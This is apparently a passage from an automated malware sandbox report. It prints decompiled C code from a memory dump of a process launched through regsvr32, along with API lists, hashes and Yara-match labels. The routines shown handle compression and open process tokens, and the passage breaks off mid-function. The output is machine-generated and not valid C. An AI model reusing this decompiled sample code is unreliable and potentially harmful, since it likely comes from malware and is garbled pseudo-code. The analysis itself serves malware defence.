                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bece43bf096662d67de26d6c7eb87f9a3dfbeb91cd56bb5b59e83ecfbeec31c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D618DB5E10209EFDB00CF98C485BEDBBF1BF08355F248599E855AB291D374AA80DF90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042B4100 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                              			E042B4100(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xfed1e900
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0xbde85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E042B7120(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E042B5E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E042B5FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E042B5FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xbde85000
							E042B7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E042B5E80( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xbde85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                                                                                                                                                                                              0x042b4106
                                                                                                                                                                                              0x042b410b
                                                                                                                                                                                              0x042b410f
                                                                                                                                                                                              0x042b4112
                                                                                                                                                                                              0x042b4112
                                                                                                                                                                                              0x042b4115
                                                                                                                                                                                              0x042b411a
                                                                                                                                                                                              0x042b411f
                                                                                                                                                                                              0x042b4122
                                                                                                                                                                                              0x042b4127
                                                                                                                                                                                              0x042b412a
                                                                                                                                                                                              0x042b4130
                                                                                                                                                                                              0x042b4130
                                                                                                                                                                                              0x042b413b
                                                                                                                                                                                              0x042b413e
                                                                                                                                                                                              0x042b4145
                                                                                                                                                                                              0x042b414a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b4150
                                                                                                                                                                                              0x042b4155
                                                                                                                                                                                              0x042b4155
                                                                                                                                                                                              0x042b415a
                                                                                                                                                                                              0x042b4160
                                                                                                                                                                                              0x042b416a
                                                                                                                                                                                              0x042b416f
                                                                                                                                                                                              0x042b4175
                                                                                                                                                                                              0x042b4194
                                                                                                                                                                                              0x042b4197
                                                                                                                                                                                              0x042b41a2
                                                                                                                                                                                              0x042b41a2
                                                                                                                                                                                              0x042b41a2
                                                                                                                                                                                              0x042b4199
                                                                                                                                                                                              0x042b4199
                                                                                                                                                                                              0x042b419b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b419d
                                                                                                                                                                                              0x042b419d
                                                                                                                                                                                              0x042b419d
                                                                                                                                                                                              0x042b419b
                                                                                                                                                                                              0x042b41aa
                                                                                                                                                                                              0x042b41af
                                                                                                                                                                                              0x042b41b4
                                                                                                                                                                                              0x042b41ba
                                                                                                                                                                                              0x042b41be
                                                                                                                                                                                              0x042b41c1
                                                                                                                                                                                              0x042b41c4
                                                                                                                                                                                              0x042b41ca
                                                                                                                                                                                              0x042b41cf
                                                                                                                                                                                              0x042b41d2
                                                                                                                                                                                              0x042b41d8
                                                                                                                                                                                              0x042b41dd
                                                                                                                                                                                              0x042b41e3
                                                                                                                                                                                              0x042b41e9
                                                                                                                                                                                              0x042b41ee
                                                                                                                                                                                              0x042b41f1
                                                                                                                                                                                              0x042b41f6
                                                                                                                                                                                              0x042b41fa
                                                                                                                                                                                              0x042b41fe
                                                                                                                                                                                              0x042b4201
                                                                                                                                                                                              0x042b4204
                                                                                                                                                                                              0x042b420d
                                                                                                                                                                                              0x042b4214
                                                                                                                                                                                              0x042b4217
                                                                                                                                                                                              0x042b421a
                                                                                                                                                                                              0x042b421f
                                                                                                                                                                                              0x042b4224
                                                                                                                                                                                              0x042b4227
                                                                                                                                                                                              0x042b422a
                                                                                                                                                                                              0x042b422a
                                                                                                                                                                                              0x042b422e
                                                                                                                                                                                              0x042b4237
                                                                                                                                                                                              0x042b423e
                                                                                                                                                                                              0x042b4241
                                                                                                                                                                                              0x042b4246
                                                                                                                                                                                              0x042b424b
                                                                                                                                                                                              0x042b424b
                                                                                                                                                                                              0x042b424e
                                                                                                                                                                                              0x042b4253
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b4177
                                                                                                                                                                                              0x042b4179
                                                                                                                                                                                              0x042b4186
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b4186
                                                                                                                                                                                              0x042b4179
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b4175
                                                                                                                                                                                              0x042b4259
                                                                                                                                                                                              0x042b425e
                                                                                                                                                                                              0x042b4261
                                                                                                                                                                                              0x042b4264
                                                                                                                                                                                              0x042b430f
                                                                                                                                                                                              0x042b430f
                                                                                                                                                                                              0x042b426a
                                                                                                                                                                                              0x042b426a
                                                                                                                                                                                              0x042b426a
                                                                                                                                                                                              0x042b426f
                                                                                                                                                                                              0x042b4299
                                                                                                                                                                                              0x042b429c
                                                                                                                                                                                              0x042b429c
                                                                                                                                                                                              0x042b42a1
                                                                                                                                                                                              0x042b42a3
                                                                                                                                                                                              0x042b42a5
                                                                                                                                                                                              0x042b42a8
                                                                                                                                                                                              0x042b42ab
                                                                                                                                                                                              0x042b42b3
                                                                                                                                                                                              0x042b42b8
                                                                                                                                                                                              0x042b42b8
                                                                                                                                                                                              0x042b42be
                                                                                                                                                                                              0x042b42c1
                                                                                                                                                                                              0x042b42c4
                                                                                                                                                                                              0x042b42c7
                                                                                                                                                                                              0x042b42c9
                                                                                                                                                                                              0x042b42c9
                                                                                                                                                                                              0x042b42ca
                                                                                                                                                                                              0x042b42ca
                                                                                                                                                                                              0x042b42c7
                                                                                                                                                                                              0x042b42d8
                                                                                                                                                                                              0x042b42db
                                                                                                                                                                                              0x042b42df
                                                                                                                                                                                              0x042b42e4
                                                                                                                                                                                              0x042b42e7
                                                                                                                                                                                              0x042b42ea
                                                                                                                                                                                              0x042b42ea
                                                                                                                                                                                              0x042b42ea
                                                                                                                                                                                              0x042b42ed
                                                                                                                                                                                              0x042b42ed
                                                                                                                                                                                              0x042b42f0
                                                                                                                                                                                              0x042b42f0
                                                                                                                                                                                              0x042b4271
                                                                                                                                                                                              0x042b4271
                                                                                                                                                                                              0x042b4281
                                                                                                                                                                                              0x042b4284
                                                                                                                                                                                              0x042b4289
                                                                                                                                                                                              0x042b4289
                                                                                                                                                                                              0x042b428c
                                                                                                                                                                                              0x042b428f
                                                                                                                                                                                              0x042b4292
                                                                                                                                                                                              0x042b4294
                                                                                                                                                                                              0x042b4294
                                                                                                                                                                                              0x042b42f3
                                                                                                                                                                                              0x042b42f5
                                                                                                                                                                                              0x042b42f8
                                                                                                                                                                                              0x042b42f8
                                                                                                                                                                                              0x042b42fe
                                                                                                                                                                                              0x042b4302
                                                                                                                                                                                              0x042b4305
                                                                                                                                                                                              0x042b4307
                                                                                                                                                                                              0x042b4307
                                                                                                                                                                                              0x042b4318
                                                                                                                                                                                              0x042b431a
                                                                                                                                                                                              0x042b431a
                                                                                                                                                                                              0x042b4322
                                                                                                                                                                                              0x042b4330
                                                                                                                                                                                              0x042b4333
                                                                                                                                                                                              0x042b4335
                                                                                                                                                                                              0x042b4355
                                                                                                                                                                                              0x042b4355
                                                                                                                                                                                              0x042b4358
                                                                                                                                                                                              0x042b435e
                                                                                                                                                                                              0x042b435f
                                                                                                                                                                                              0x042b4362
                                                                                                                                                                                              0x042b4364
                                                                                                                                                                                              0x042b4367
                                                                                                                                                                                              0x042b436a
                                                                                                                                                                                              0x042b436d
                                                                                                                                                                                              0x042b4371
                                                                                                                                                                                              0x042b4374
                                                                                                                                                                                              0x042b4377
                                                                                                                                                                                              0x042b437a
                                                                                                                                                                                              0x042b437c
                                                                                                                                                                                              0x042b437c
                                                                                                                                                                                              0x042b437f
                                                                                                                                                                                              0x042b4381
                                                                                                                                                                                              0x042b4381
                                                                                                                                                                                              0x042b4384
                                                                                                                                                                                              0x042b4386
                                                                                                                                                                                              0x042b4389
                                                                                                                                                                                              0x042b4391
                                                                                                                                                                                              0x042b4394
                                                                                                                                                                                              0x042b4399
                                                                                                                                                                                              0x042b4399
                                                                                                                                                                                              0x042b439f
                                                                                                                                                                                              0x042b43a2
                                                                                                                                                                                              0x042b43a5
                                                                                                                                                                                              0x042b43a7
                                                                                                                                                                                              0x042b43a7
                                                                                                                                                                                              0x042b43a8
                                                                                                                                                                                              0x042b43a8
                                                                                                                                                                                              0x042b43b3
                                                                                                                                                                                              0x042b43b3
                                                                                                                                                                                              0x042b43b3
                                                                                                                                                                                              0x042b43b6
                                                                                                                                                                                              0x042b43b9
                                                                                                                                                                                              0x042b43b9
                                                                                                                                                                                              0x042b43bc
                                                                                                                                                                                              0x042b43bc
                                                                                                                                                                                              0x042b437f
                                                                                                                                                                                              0x042b43bf
                                                                                                                                                                                              0x042b43c2
                                                                                                                                                                                              0x042b43c5
                                                                                                                                                                                              0x042b43c7
                                                                                                                                                                                              0x042b43ca
                                                                                                                                                                                              0x042b43cc
                                                                                                                                                                                              0x042b43cf
                                                                                                                                                                                              0x042b43d2
                                                                                                                                                                                              0x042b43d4
                                                                                                                                                                                              0x042b43d7
                                                                                                                                                                                              0x042b43df
                                                                                                                                                                                              0x042b43e7
                                                                                                                                                                                              0x042b43ea
                                                                                                                                                                                              0x042b43ea
                                                                                                                                                                                              0x042b43ea
                                                                                                                                                                                              0x042b43ed
                                                                                                                                                                                              0x042b43ed
                                                                                                                                                                                              0x042b43ed
                                                                                                                                                                                              0x042b43f0
                                                                                                                                                                                              0x042b43f6
                                                                                                                                                                                              0x042b43f8
                                                                                                                                                                                              0x042b43f8
                                                                                                                                                                                              0x042b43fe
                                                                                                                                                                                              0x042b4404
                                                                                                                                                                                              0x042b440d
                                                                                                                                                                                              0x042b4414
                                                                                                                                                                                              0x042b4416
                                                                                                                                                                                              0x042b4419
                                                                                                                                                                                              0x042b4419
                                                                                                                                                                                              0x042b441c
                                                                                                                                                                                              0x042b441c
                                                                                                                                                                                              0x042b441f
                                                                                                                                                                                              0x042b4421
                                                                                                                                                                                              0x042b4424
                                                                                                                                                                                              0x042b4426
                                                                                                                                                                                              0x042b4441
                                                                                                                                                                                              0x042b4441
                                                                                                                                                                                              0x042b4445
                                                                                                                                                                                              0x042b4448
                                                                                                                                                                                              0x042b444b
                                                                                                                                                                                              0x042b444e
                                                                                                                                                                                              0x042b4464
                                                                                                                                                                                              0x042b4464
                                                                                                                                                                                              0x042b4464
                                                                                                                                                                                              0x042b4450
                                                                                                                                                                                              0x042b4450
                                                                                                                                                                                              0x042b4452
                                                                                                                                                                                              0x042b4456
                                                                                                                                                                                              0x042b4459
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b445b
                                                                                                                                                                                              0x042b445b
                                                                                                                                                                                              0x042b445d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b445f
                                                                                                                                                                                              0x042b445f
                                                                                                                                                                                              0x042b445f
                                                                                                                                                                                              0x042b445d
                                                                                                                                                                                              0x042b4459
                                                                                                                                                                                              0x042b4468
                                                                                                                                                                                              0x042b446b
                                                                                                                                                                                              0x042b4470
                                                                                                                                                                                              0x042b447a
                                                                                                                                                                                              0x042b447a
                                                                                                                                                                                              0x042b447a
                                                                                                                                                                                              0x042b447d
                                                                                                                                                                                              0x042b4428
                                                                                                                                                                                              0x042b4428
                                                                                                                                                                                              0x042b442a
                                                                                                                                                                                              0x042b4431
                                                                                                                                                                                              0x042b4431
                                                                                                                                                                                              0x042b4433
                                                                                                                                                                                              0x042b4435
                                                                                                                                                                                              0x042b4437
                                                                                                                                                                                              0x042b443b
                                                                                                                                                                                              0x042b443d
                                                                                                                                                                                              0x042b443f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b443f
                                                                                                                                                                                              0x042b443b
                                                                                                                                                                                              0x042b442c
                                                                                                                                                                                              0x042b442c
                                                                                                                                                                                              0x042b442f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b442f
                                                                                                                                                                                              0x042b442a
                                                                                                                                                                                              0x042b4487
                                                                                                                                                                                              0x042b4489
                                                                                                                                                                                              0x042b4489
                                                                                                                                                                                              0x042b4494
                                                                                                                                                                                              0x042b4337
                                                                                                                                                                                              0x042b4337
                                                                                                                                                                                              0x042b433a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b433c
                                                                                                                                                                                              0x042b433c
                                                                                                                                                                                              0x042b433e
                                                                                                                                                                                              0x042b4342
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b4344
                                                                                                                                                                                              0x042b4344
                                                                                                                                                                                              0x042b4344
                                                                                                                                                                                              0x042b4347
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b434b
                                                                                                                                                                                              0x042b4354
                                                                                                                                                                                              0x042b4354
                                                                                                                                                                                              0x042b4347
                                                                                                                                                                                              0x042b4342
                                                                                                                                                                                              0x042b433a
                                                                                                                                                                                              0x042b4326
                                                                                                                                                                                              0x042b432f
                                                                                                                                                                                              0x042b432f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                              • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction ID: cd962acf355207a22219db905af242a8b1b18c431bf59497f58294119a8a6e77
                                                                                                                                                                                              • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 26D10471B107019FDB24DF69D8C09AAB7E5EF88384B24892DE8DAC7702D731F9458B94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AC79E Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042AC79E(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x42bf818; // 0x48ef8b0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






                                                                                                                                                                                              0x042ac7bd
                                                                                                                                                                                              0x042ac7ef
                                                                                                                                                                                              0x042ac7ef
                                                                                                                                                                                              0x042ac7bf
                                                                                                                                                                                              0x042ac7ca
                                                                                                                                                                                              0x042ac7eb
                                                                                                                                                                                              0x042ac7eb
                                                                                                                                                                                              0x042ac7cc
                                                                                                                                                                                              0x042ac7d6
                                                                                                                                                                                              0x042ac7e9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ac7e9
                                                                                                                                                                                              0x042ac7ca
                                                                                                                                                                                              0x042ac7f4

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 042AC7B1
                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,042AC8E3,00000000,042A0000), ref: 042AC7B8
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,042AC8E3,00000000,042A0000), ref: 042AC7BF
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,042AC8E3,00000000,042A0000), ref: 042AC7E4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1515895013-0
                                                                                                                                                                                              • Opcode ID: 1f63c830d766009932634072d065d3308fc291f2ca2fc19f98cfae4982fd6994
                                                                                                                                                                                              • Instruction ID: 02cff625a390add360aa6cd1617a2d14b556b849438fddcc3b16ddf0a9c38b35
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f63c830d766009932634072d065d3308fc291f2ca2fc19f98cfae4982fd6994
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EF03AB2714606ABDB009FA9ED4DB9A37ECFB09340F0044A0EA82D7040E764FE408BE0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AD218 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E042AD218(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x42bf81c; // 0x48efbe8
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E042A9DF2(_t50, 0x392);
					_t66 =  *0x42bf81c; // 0x48efbe8
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
